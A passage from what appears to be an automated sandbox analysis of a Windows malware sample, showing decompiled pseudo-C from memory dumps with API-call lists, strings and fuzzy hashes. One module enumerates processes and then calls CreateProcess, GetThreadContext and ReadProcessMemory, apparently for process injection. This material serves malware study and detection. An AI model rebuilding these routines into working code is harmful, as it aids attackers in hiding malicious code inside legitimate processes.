                                                                                                                          										_v60(0xbb8);
                                                                                                                          										E703C3005(_t156,  &_v140, 0x10);
                                                                                                                          										E703C3005(_t156,  &_v208, 0x44);
                                                                                                                          										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
                                                                                                                          										__eflags = _t137;
                                                                                                                          										if(_t137 != 0) {
                                                                                                                          											_t137 = _v64(0);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									ExitProcess(0);
                                                                                                                          								}
                                                                                                                          								return _t134;
                                                                                                                          							}
                                                                                                                          							return _t132;
                                                                                                                          						}
                                                                                                                          						return _t131;
                                                                                                                          					}
                                                                                                                          					return _t130;
                                                                                                                          				}
                                                                                                                          				_t147 = 4;
                                                                                                                          				_t149 = E703C4243(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
                                                                                                                          				_t161 = _t149;
                                                                                                                          				if(_t149 != 0) {
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				_t150 = 4;
                                                                                                                          				_t152 = E703C4243(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
                                                                                                                          				_t162 = _t152;
                                                                                                                          				if(_t152 != 0) {
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				_t153 = 4;
                                                                                                                          				_t155 = E703C4243(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
                                                                                                                          				if(_t155 == 0) {
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          				goto L4;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 703C4243: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 703C4288
                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 703C44D4
                                                                                                                            • Part of subcall function 703C4243: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 703C42AC
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 703C4507
                                                                                                                            • Part of subcall function 703C4243: Process32NextW.KERNEL32(000000FF,0000022C), ref: 703C42D7
                                                                                                                          • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 703C4527
                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 703C45A1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                                                                          • String ID: 21c2ae1c3b304cca8f71b07ef6b86597
                                                                                                                          • API String ID: 1567874941-3245158632
                                                                                                                          • Opcode ID: f5b54c74f550dbccd660df952d7addbd6687d87794f11ca36633288a2e0022e8
                                                                                                                          • Instruction ID: 6c62595ea9c734d90c62f9e66d4fe9120ad38b762211ee4676f41c1177c689c4
                                                                                                                          • Opcode Fuzzy Hash: f5b54c74f550dbccd660df952d7addbd6687d87794f11ca36633288a2e0022e8
                                                                                                                          • Instruction Fuzzy Hash: 80916930D04288EEFF129BE4CC4ABDEBFBAAF05714F104069E650BA1D1D7B64A15CB21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E004032BF(intOrPtr _a4) {
                                                                                                                          				intOrPtr _t11;
                                                                                                                          				signed int _t12;
                                                                                                                          				void* _t15;
                                                                                                                          				long _t16;
                                                                                                                          				void* _t18;
                                                                                                                          				intOrPtr _t30;
                                                                                                                          				intOrPtr _t33;
                                                                                                                          				intOrPtr _t35;
                                                                                                                          				void* _t36;
                                                                                                                          				intOrPtr _t48;
                                                                                                                          
                                                                                                                          				_t33 =  *0x429464 -  *0x40b898 + _a4;
                                                                                                                          				 *0x42f450 = GetTickCount() + 0x1f4;
                                                                                                                          				if(_t33 <= 0) {
                                                                                                                          					L22:
                                                                                                                          					E00402E52(1);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				E0040343E( *0x429474);
                                                                                                                          				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
                                                                                                                          				 *0x429470 = _t33;
                                                                                                                          				 *0x429460 = 0;
                                                                                                                          				while(1) {
                                                                                                                          					_t30 = 0x4000;
                                                                                                                          					_t11 =  *0x429468 -  *0x429474;
                                                                                                                          					if(_t11 <= 0x4000) {
                                                                                                                          						_t30 = _t11;
                                                                                                                          					}
                                                                                                                          					_t12 = E00403428(0x41d460, _t30);
                                                                                                                          					if(_t12 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					 *0x429474 =  *0x429474 + _t30;
                                                                                                                          					 *0x40b8a0 = 0x41d460;
                                                                                                                          					 *0x40b8a4 = _t30;
                                                                                                                          					L6:
                                                                                                                          					L6:
                                                                                                                          					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
                                                                                                                          						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
                                                                                                                          						E00402E52(0);
                                                                                                                          					}
                                                                                                                          					 *0x40b8a8 = 0x415460;
                                                                                                                          					 *0x40b8ac = 0x8000;
                                                                                                                          					if(E0040677B(0x40b8a0) < 0) {
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          					_t35 =  *0x40b8a8; // 0x415f40
                                                                                                                          					_t36 = _t35 - 0x415460;
                                                                                                                          					if(_t36 == 0) {
                                                                                                                          						__eflags =  *0x40b8a4; // 0x0
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _t30;
                                                                                                                          						if(_t30 == 0) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						L16:
                                                                                                                          						_t16 =  *0x429464;
                                                                                                                          						if(_t16 -  *0x40b898 + _a4 > 0) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
                                                                                                                          					if(_t18 == 0) {
                                                                                                                          						_push(0xfffffffe);
                                                                                                                          						L21:
                                                                                                                          						_pop(_t15);
                                                                                                                          						return _t15;
                                                                                                                          					}
                                                                                                                          					 *0x40b898 =  *0x40b898 + _t36;
                                                                                                                          					_t48 =  *0x40b8a4; // 0x0
                                                                                                                          					if(_t48 != 0) {
                                                                                                                          						goto L6;
                                                                                                                          					}
                                                                                                                          					goto L16;
                                                                                                                          					L20:
                                                                                                                          					_push(0xfffffffd);
                                                                                                                          					goto L21;
                                                                                                                          				}
                                                                                                                          				return _t12 | 0xffffffff;
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 004032D3
                                                                                                                            • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                          • String ID: @_A$`TA
                                                                                                                          • API String ID: 1092082344-4188502979
                                                                                                                          • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                                                          • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                                                                          • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                                                          • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                          				char _t11;
                                                                                                                          				signed int _t12;
                                                                                                                          				int _t15;
                                                                                                                          				signed int _t17;
                                                                                                                          				void* _t20;
                                                                                                                          				CHAR* _t21;
                                                                                                                          
                                                                                                                          				_t21 = _a4;
                                                                                                                          				_t20 = 0x64;
                                                                                                                          				while(1) {
                                                                                                                          					_t11 =  *0x40a3ec; // 0x61736e
                                                                                                                          					_t20 = _t20 - 1;
                                                                                                                          					_a4 = _t11;
                                                                                                                          					_t12 = GetTickCount();
                                                                                                                          					_t17 = 0x1a;
                                                                                                                          					_a6 = _a6 + _t12 % _t17;
                                                                                                                          					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                                                          					if(_t15 != 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					if(_t20 != 0) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					 *_t21 =  *_t21 & 0x00000000;
                                                                                                                          					return _t15;
                                                                                                                          				}
                                                                                                                          				return _t21;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00405E29
                                                                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
                                                                                                                          • nsa, xrefs: 00405E20
                                                                                                                          • "C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00405E15
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-2464025690
                                                                                                                          • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                                                          • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                                                                          • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                                                          • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E704816DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				void _v36;
                                                                                                                          				char _v88;
                                                                                                                          				struct HINSTANCE__* _t37;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				void* _t48;
                                                                                                                          				void* _t49;
                                                                                                                          				void* _t50;
                                                                                                                          				void* _t54;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				signed int _t61;
                                                                                                                          				signed int _t63;
                                                                                                                          				void* _t67;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t76;
                                                                                                                          
                                                                                                                          				_t76 = __esi;
                                                                                                                          				_t68 = __edi;
                                                                                                                          				_t67 = __edx;
                                                                                                                          				 *0x7048405c = _a8;
                                                                                                                          				 *0x70484060 = _a16;
                                                                                                                          				 *0x70484064 = _a12;
                                                                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x70484038, E70481556);
                                                                                                                          				_push(1); // executed
                                                                                                                          				_t37 = E70481A98(); // executed
                                                                                                                          				_t54 = _t37;
                                                                                                                          				if(_t54 == 0) {
                                                                                                                          					L28:
                                                                                                                          					return _t37;
                                                                                                                          				} else {
                                                                                                                          					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                          						E704822AF(_t54);
                                                                                                                          					}
                                                                                                                          					E704822F1(_t67, _t54);
                                                                                                                          					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                          					if(_t57 == 0xffffffff) {
                                                                                                                          						L14:
                                                                                                                          						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                                                                                                          							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                                                          								_t37 = E704824D8(_t54);
                                                                                                                          							} else {
                                                                                                                          								_push(_t76);
                                                                                                                          								_push(_t68);
                                                                                                                          								_t61 = 8;
                                                                                                                          								_t13 = _t54 + 0x818; // 0x818
                                                                                                                          								memcpy( &_v36, _t13, _t61 << 2);
                                                                                                                          								_t42 = E7048156B(_t54,  &_v88);
                                                                                                                          								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                                                                                                          								_t18 = _t54 + 0x818; // 0x818
                                                                                                                          								_t72 = _t18;
                                                                                                                          								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                                                                                                          								 *_t72 = 3;
                                                                                                                          								E704824D8(_t54);
                                                                                                                          								_t63 = 8;
                                                                                                                          								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E704824D8(_t54);
                                                                                                                          							_t37 = GlobalFree(E70481266(E70481559(_t54)));
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                          							_t37 = E7048249E(_t54);
                                                                                                                          							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                                                          								_t37 =  *(_t54 + 0x808);
                                                                                                                          								if(_t37 != 0) {
                                                                                                                          									_t37 = FreeLibrary(_t37);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                                                                                                          								_t37 = E704814E2( *0x70484058);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                                                                                                          							goto L28;
                                                                                                                          						} else {
                                                                                                                          							return GlobalFree(_t54);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t48 =  *_t54;
                                                                                                                          					if(_t48 == 0) {
                                                                                                                          						if(_t57 != 1) {
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						E70482CC3(_t54);
                                                                                                                          						L12:
                                                                                                                          						_t54 = _t48;
                                                                                                                          						L13:
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          					_t49 = _t48 - 1;
                                                                                                                          					if(_t49 == 0) {
                                                                                                                          						L8:
                                                                                                                          						_t48 = E70482A38(_t57, _t54); // executed
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					_t50 = _t49 - 1;
                                                                                                                          					if(_t50 == 0) {
                                                                                                                          						E704826B2(_t54);
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					if(_t50 != 1) {
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          					goto L8;
                                                                                                                          				}
                                                                                                                          			}



















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 70481A98: GlobalFree.KERNEL32 ref: 70481D09
                                                                                                                            • Part of subcall function 70481A98: GlobalFree.KERNEL32 ref: 70481D0E
                                                                                                                            • Part of subcall function 70481A98: GlobalFree.KERNEL32 ref: 70481D13
                                                                                                                          • GlobalFree.KERNEL32 ref: 70481786
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 70481809
                                                                                                                          • GlobalFree.KERNEL32 ref: 7048182E
                                                                                                                            • Part of subcall function 704822AF: GlobalAlloc.KERNEL32(00000040,?), ref: 704822E0
                                                                                                                            • Part of subcall function 704826B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70481757,00000000), ref: 70482782
                                                                                                                            • Part of subcall function 7048156B: wsprintfA.USER32 ref: 70481599
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                          • Opcode ID: 636fbef54cf5d8923a39e1f1ad1825c8b71b4cf8a98b6d6ad95621b514e215f9
                                                                                                                          • Instruction ID: e6328d7a20b4ccc19f699d89193876973dad422f74696d2d4fe197a99f21e4c5
                                                                                                                          • Opcode Fuzzy Hash: 636fbef54cf5d8923a39e1f1ad1825c8b71b4cf8a98b6d6ad95621b514e215f9
                                                                                                                          • Instruction Fuzzy Hash: 1F414F725002049ECB01AF64DD85B9E37BCBB05219F148C7EF907AA3E6DB7C9845C7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 703C339B
                                                                                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 703C33BE
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 703C33E2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$ContextCreateMemoryReadThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2411489757-0
                                                                                                                          • Opcode ID: 7118c54b34ab512dc5d918d8de1f6618fdd7aa42caeacd27443f13a0f96860cb
                                                                                                                          • Instruction ID: a6196fabe8d1ea90fca7c602373daba6f680760c5b65301085c4aec816228275
                                                                                                                          • Opcode Fuzzy Hash: 7118c54b34ab512dc5d918d8de1f6618fdd7aa42caeacd27443f13a0f96860cb
                                                                                                                          • Instruction Fuzzy Hash: 8A321631E40208AEEB11CBA4DC45BEEB7B9BF04700F20409AE619FA2E0D7759E95DF15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E0040209D(void* __ebx, void* __eflags) {
                                                                                                                          				struct HINSTANCE__* _t18;
                                                                                                                          				struct HINSTANCE__* _t26;
                                                                                                                          				void* _t27;
                                                                                                                          				struct HINSTANCE__* _t30;
                                                                                                                          				CHAR* _t32;
                                                                                                                          				intOrPtr* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          
                                                                                                                          				_t27 = __ebx;
                                                                                                                          				asm("sbb eax, 0x42f518");
                                                                                                                          				 *(_t34 - 4) = 1;
                                                                                                                          				if(__eflags < 0) {
                                                                                                                          					_push(0xffffffe7);
                                                                                                                          					L15:
                                                                                                                          					E00401423();
                                                                                                                          					L16:
                                                                                                                          					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t32 = E00402BCE(0xfffffff0);
                                                                                                                          				 *(_t34 + 8) = E00402BCE(1);
                                                                                                                          				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                                                          					L3:
                                                                                                                          					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                                                          					_t30 = _t18;
                                                                                                                          					if(_t30 == _t27) {
                                                                                                                          						_push(0xfffffff6);
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          					L4:
                                                                                                                          					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                          					if(_t33 == _t27) {
                                                                                                                          						E00405374(0xfffffff7,  *(_t34 + 8));
                                                                                                                          					} else {
                                                                                                                          						 *(_t34 - 4) = _t27;
                                                                                                                          						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                                                          							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
                                                                                                                          						} else {
                                                                                                                          							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                                                          							if( *_t33() != 0) {
                                                                                                                          								 *(_t34 - 4) = 1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
                                                                                                                          						FreeLibrary(_t30);
                                                                                                                          					}
                                                                                                                          					goto L16;
                                                                                                                          				}
                                                                                                                          				_t26 = GetModuleHandleA(_t32); // executed
                                                                                                                          				_t30 = _t26;
                                                                                                                          				if(_t30 != __ebx) {
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				goto L3;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2987980305-0
                                                                                                                          • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                                                          • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                                                                          • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                                                          • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E004015BB(char __ebx, void* __eflags) {
                                                                                                                          				void* _t13;
                                                                                                                          				int _t19;
                                                                                                                          				char _t21;
                                                                                                                          				void* _t22;
                                                                                                                          				char _t23;
                                                                                                                          				signed char _t24;
                                                                                                                          				char _t26;
                                                                                                                          				CHAR* _t28;
                                                                                                                          				char* _t32;
                                                                                                                          				void* _t33;
                                                                                                                          
                                                                                                                          				_t26 = __ebx;
                                                                                                                          				_t28 = E00402BCE(0xfffffff0);
                                                                                                                          				_t13 = E00405C7E(_t28);
                                                                                                                          				_t30 = _t13;
                                                                                                                          				if(_t13 != __ebx) {
                                                                                                                          					do {
                                                                                                                          						_t32 = E00405C10(_t30, 0x5c);
                                                                                                                          						_t21 =  *_t32;
                                                                                                                          						 *_t32 = _t26;
                                                                                                                          						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                                                          						if(_t21 != _t26) {
                                                                                                                          							L5:
                                                                                                                          							_t22 = E004058B7(_t28);
                                                                                                                          						} else {
                                                                                                                          							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                                                          							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
                                                                                                                          								goto L5;
                                                                                                                          							} else {
                                                                                                                          								_t22 = E0040583A(_t28); // executed
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t22 != _t26) {
                                                                                                                          							if(_t22 != 0xb7) {
                                                                                                                          								L9:
                                                                                                                          								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                          							} else {
                                                                                                                          								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                                          								if((_t24 & 0x00000010) == 0) {
                                                                                                                          									goto L9;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                                          						 *_t32 = _t23;
                                                                                                                          						_t30 = _t32 + 1;
                                                                                                                          					} while (_t23 != _t26);
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                                                          					_push(0xfffffff5);
                                                                                                                          					E00401423();
                                                                                                                          				} else {
                                                                                                                          					E00401423(0xffffffe6);
                                                                                                                          					E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
                                                                                                                          					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                                                          					if(_t19 == 0) {
                                                                                                                          						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,74B5FA90,?,74B5F560,00405A35,?,74B5FA90,74B5F560,00000000), ref: 00405C8C
                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                                                                            • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
